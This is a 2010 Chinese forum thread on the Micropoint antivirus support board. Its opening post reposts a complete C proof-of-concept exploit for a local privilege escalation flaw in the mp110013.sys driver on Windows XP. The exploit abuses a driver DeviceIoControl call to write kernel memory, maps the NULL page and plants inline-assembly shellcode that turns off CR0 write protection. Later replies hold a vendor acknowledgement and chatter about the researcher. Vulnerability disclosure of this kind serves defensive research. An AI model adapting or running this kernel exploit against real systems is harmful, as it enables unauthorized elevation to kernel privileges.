微点交流论坛 - 微点茶室 - 网络惊现利用微点提权！！

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 微点茶室 » 网络惊现利用微点提权！！

1/2

jkok20
中级用户

积分 333
发帖 330
注册 2008-11-22

#1 网络惊现利用微点提权！！

微点主动防御软件mp110013.sys驱动本地权限提升漏洞

http://bbs.yhsafe.com/thread-10845-1-2.html

Micropoint Proactive Denfense Mp110013.sys <= 1.3.10123.0 Local Privilege Escalation Exploit
VULNERABLE PRODUCTS
Micropoint Proactive Denfense <= 100323.1.2.10581.0285.r1
mp110013.sys <= 1.3.10123.0
DETAILS:
mp110013.sys handles DeviceIoControl request which tells driver PspCreateProcessNotifyRoutine/PspCreateProcessNotifyRoutineCount offset ,Attacker can use this interface write  kernel memory
EXPOLIT CODE
//write ntdll.dll base + 0x8 with "6543" in kernel mode
#include "stdafx.h"
#include "windows.h"
#include "shlwapi.h"
#pragma comment(lib , "shlwapi.lib")
VOID __declspec(naked) ShellCode()
{
__asm
{
pushad
mov eax , cr0
push eax
and eax, 0xFFFEFFFF
mov cr0 , eax
cli
mov eax , 0xAAAA5555
mov dword ptr[eax] , 0x33343536
sti
pop eax
mov cr0 , eax
popad
ret 0x4
}
}
VOID __declspec(naked) nopfunc()
{
__asm{mov edi ,edi
nop };
}
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
   push 0
   push mSize
   push mPtr
   push ATableType
   call pZwQuerySystemInformation
   mov status , eax
}

}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
DWORD WINAPI LegoThread(LPVOID lpThreadParameter)
{
while(TRUE)
{
Sleep(0x1000);
}
return 0 ;
}
int main(int argc, char* argv[])
{
DWORD dwVersion = 0;
DWORD dwMajorVersion = 0;
DWORD dwMinorVersion = 0;

dwVersion = GetVersion();
// Get the Windows version.
dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
if (dwMajorVersion != 5 || dwMinorVersion != 1)
{
printf("POC for XP only\n");
getchar();
return 0 ;
}
printf("Micropoint Mp110003.sys <= 1.3.10123.0 Local Privilege Escalation Vulnerability POC\n"
"by MJ0011 th_decoder$126.com\n"
"Press Enter\n");
getchar();

HANDLE hDev = CreateFile("\\\\.\\mp110013" ,
0 ,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
0,
OPEN_EXISTING,0,
0
);
if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device %u\n" , GetLastError());
return 0 ;
}

PVOID BaseAddress          = (PVOID) 1;
ULONG RegionSize             = (ULONG) 0;
PVOID pNtAllocateVirtualMemory = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
PVOID pNtFreeVirtualMemory = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtFreeVirtualMemory");
ULONG status ;
__asm
{
push 0x8000
lea eax , RegionSize
push eax
lea eax , BaseAddress
push eax
push 0xffffffff
call pNtFreeVirtualMemory
mov RegionSize,0x1000
push 0x40
push 0x3000
lea eax , RegionSize
push eax
push 0
lea eax , BaseAddress
push eax
push 0xffffffff
call pNtAllocateVirtualMemory
mov status , eax
}
if (status != 0 )
{
printf("allocate 0 memory failed %08x\n" , status);
return 0 ;
}
//set nop code
ULONG codesize = (ULONG)nopfunc - (ULONG)ShellCode;
memset((PVOID)0 , 0x90 , 0x8);
memcpy((PVOID)0x8 , ShellCode , codesize);
ULONG i ;
for (i = 0x8 ; i < codesize+0x8 ; i++)
{
if (*(DWORD*)i == 0xAAAA5555)
{
*(DWORD*)i = (DWORD)(GetModuleHandle("ntdll.dll") + 0x2);
break ;
}
}
PSYSTEM_MODULE_INFORMATION pModInfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
if (pModInfo == 0 )
{
printf("get info table failed!\n");
return 0 ;
}
ULONG Tid ;
HANDLE hThread = CreateThread(0 , 0 , LegoThread , 0 , 0 , &Tid);
if (hThread == 0 )
{
printf("cannot open thread %u\n",GetLastError());
return 0 ;
}
//SystemHandleInformation=16
PSYSTEM_HANDLE_INFORMATION pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(16);
if (pHandleInfo == 0 )
{
printf("cannot get handle info\n");
return 0 ;
}
ULONG ThreadObject =0;
for (i = 0 ; i < pHandleInfo->NumberOfHandles ; i ++)
{
if (pHandleInfo->Information.UniqueProcessId == GetCurrentProcessId() &&
pHandleInfo->Information.HandleValue == (USHORT)hThread)
{
ThreadObject = (ULONG)pHandleInfo->Information.Object;
break ;
}
}
if (ThreadObject == 0 )
{
printf("cannot get thread object!\n");
return 0 ;
}
ThreadObject+=0xd0;

HMODULE hkernel = LoadLibraryA(strrchr(pModInfo->Module[0].ImageName, '\\') + 1);
if (hkernel == 0 )
{
printf("kernel mapping error %u\n" , GetLastError());
return 0 ;
}
ULONG PsSetLegoNotifyRoutine = (ULONG)GetProcAddress(hkernel , "PsSetLegoNotifyRoutine");
ULONG PspLegoNotifyRoutine = 0 ;
if (PsSetLegoNotifyRoutine ==0)
{
printf("PsSetLegoNotifyRoutine==0");
return 0 ;
}
for (i = PsSetLegoNotifyRoutine ; i < PsSetLegoNotifyRoutine + 0x10 ; i ++)
{
if (*(BYTE*)i == 0xa3 && *(BYTE*)(i + 5 == 0xb8 ) && *(DWORD*)(i + 6 )==0xd0)
{
PspLegoNotifyRoutine = *(ULONG*)(i +1);
break ;
}
}
if (PspLegoNotifyRoutine == 0 )
{
printf("bad PsSetLegoNotifyRoutine\n");
return 0 ;
}
ULONG PsSetCreateProcessNotifyRoutine = (ULONG)GetProcAddress(hkernel , "PsSetCreateProcessNotifyRoutine");
ULONG PspCreateProcessNotifyRoutine= 0 ;
if (PsSetCreateProcessNotifyRoutine==0)
{
printf("PsSetCreateProcessNotifyRoutine==0!\n");
return 0 ;
}
for (i = PsSetCreateProcessNotifyRoutine ; i < PsSetCreateProcessNotifyRoutine + 0x30 ; i ++)
{
if (*(BYTE*)i == 0xbf && *(WORD*)(i + 5) == 0xe857)
{
PspCreateProcessNotifyRoutine = *(ULONG*)(i + 1);
break ;
}
}
if (PspCreateProcessNotifyRoutine ==0)
{
printf("bad PsSetCreateProcessNotifyRoutine!\n");
return 0 ;
}
PIMAGE_DOS_HEADER doshdr ;
PIMAGE_NT_HEADERS nthdr ;
doshdr = (PIMAGE_DOS_HEADER )(hkernel);
nthdr = (PIMAGE_NT_HEADERS)((ULONG)hkernel + doshdr->e_lfanew);
PspLegoNotifyRoutine += (ULONG)pModInfo->Module[0].Base - nthdr->OptionalHeader.ImageBase;
PspCreateProcessNotifyRoutine += (ULONG)pModInfo->Module[0].Base - nthdr->OptionalHeader.ImageBase;
FreeLibrary(hkernel);
ULONG PspLegoNotifyRoutineOff = (ULONG)PspLegoNotifyRoutine - (ULONG)pModInfo->Module[0].Base ;
ULONG PspCreateProcessNotifyRoutineOff = (ULONG)PspCreateProcessNotifyRoutine - (ULONG)pModInfo->Module[0].Base;
ULONG btr ;
ULONG InputBuffer[3] = {0x0 , PspCreateProcessNotifyRoutineOff , PspLegoNotifyRoutineOff };
if (!DeviceIoControl(hDev ,
0x800001A4,
&InputBuffer ,
sizeof(ULONG)*3 ,
NULL,
0,
&btr ,
0))
{
printf("device io control failed %u\n", GetLastError());
return 0 ;
}
PVOID pNtCreateProcessEx = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtCreateProcessEx");
HANDLE hProc ;
__asm
{
push 0
push 0
push 0
push 0
push 0
push 0x1
push 0
push 0
lea eax ,hProc
push eax
call pNtCreateProcessEx
}
ULONG ThreadLegoDataOff = ThreadObject - (ULONG)pModInfo->Module[0].Base ;
InputBuffer[2] = ThreadLegoDataOff;
if (!DeviceIoControl(hDev ,
0x800001A4,
&InputBuffer ,
sizeof(ULONG)*3 ,
NULL,
0,
&btr ,
0))
{
printf("device io control failed %u\n", GetLastError());
return 0 ;
}

__asm
{
push 0
push 0
push 0
push 0
push 0
push 0x1
push 0
push 0
lea eax ,hProc
push eax
call pNtCreateProcessEx
}

TerminateThread(hThread , 0 );
printf("POC Executed\n");
getchar();
return 0;
}

※ ※ ※ 本文纯属【jkok20】个人意见，与【微点交流论坛】立场无关※ ※ ※

[url]http://www.dggdwl.com[/url]

[br]出售微点主动防御。[/br]150元 3年3用户！！

2010-4-21 11:58

jkok20
中级用户

积分 333
发帖 330
注册 2008-11-22

#2

这个是转载来的。不知道微点是否已经修复呢

※ ※ ※ 本文纯属【jkok20】个人意见，与【微点交流论坛】立场无关※ ※ ※

[url]http://www.dggdwl.com[/url]

[br]出售微点主动防御。[/br]150元 3年3用户！！

2010-4-21 11:58

Legend
超级版主

超级版主

积分 77171
发帖 70170
注册 2005-10-29

#3

感谢楼主对微点的关心与支持，您所反馈的问题我们已经获知并正在做进一步的分析处理。感谢您的反馈！

※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※

微点官方认证新浪微博：欢迎进入微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息

2010-4-21 12:01

snhao
银牌会员

积分 1791
发帖 1782
注册 2007-6-12

Quote:

Originally posted by Legend at 2010-4-21 12:01:
感谢楼主对微点的关心与支持，您所反馈的问题我们已经获知并正在做进一步的分析处理。感谢您的反馈！

你们应该感谢mj才是啊，毕竟人家没有义务帮你寻找问题。

※ ※ ※ 本文纯属【snhao】个人意见，与【微点交流论坛】立场无关※ ※ ※

东方微点论坛

2010-4-21 14:06

美丽明天
注册用户

积分 155
发帖 153
注册 2010-2-28
来自乌托邦

#5

真不错，发现问题就是好样

※ ※ ※ 本文纯属【美丽明天】个人意见，与【微点交流论坛】立场无关※ ※ ※

来吧来吧

2010-4-21 19:11

polar_bear
新手上路

积分 18
发帖 18
注册 2010-2-12

#6

MJ 是谁？？在论坛回帖中已经不是第一次看到这个名字了

※ ※ ※ 本文纯属【polar_bear】个人意见，与【微点交流论坛】立场无关※ ※ ※

2010-4-21 23:36

littlefritz
版主

微点帮帮团团长

积分 3505
发帖 3502
注册 2009-5-23
来自微点帮帮团

Quote:

Originally posted by polar_bear at 2010-4-21 23:36:
MJ 是谁？？在论坛回帖中已经不是第一次看到这个名字了

传说中牛B得不得了的MJ0011，现为奇虎的员工

※ ※ ※ 本文纯属【littlefritz】个人意见，与【微点交流论坛】立场无关※ ※ ※

2010-4-22 07:42

王子的天下
禁止发言

积分 126
发帖 126
注册 2010-3-24

Quote:

Originally posted by snhao at 2010-4-21 14:06:

你们应该感谢mj才是啊，毕竟人家没有义务帮你寻找问题。

搞好自己的360在说吧，

那么有本事还在360窝着？自己单干吧~

发布一个震惊世界的超牛B安防软件！！

※ ※ ※ 本文纯属【王子的天下】个人意见，与【微点交流论坛】立场无关※ ※ ※

2010-4-22 10:04

hds_ss
银牌会员

积分 1105
发帖 1101
注册 2007-2-26

#9

他好像对微点不太友爱呀！

※ ※ ※ 本文纯属【hds_ss】个人意见，与【微点交流论坛】立场无关※ ※ ※

系统为：XP Professional 版本为 2002 Sercice Pack 2
Intel946GZ+1G+PD820
预升级用户

2010-4-23 10:54

zzjzzpgg12
注册用户

积分 192
发帖 186
注册 2009-1-27

#10

比起其他的来
MJ对微点算不错的了吧~
谁叫微点当初编的时候就那么不小心呢~~

※ ※ ※ 本文纯属【zzjzzpgg12】个人意见，与【微点交流论坛】立场无关※ ※ ※

2010-4-23 11:49

1/2

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号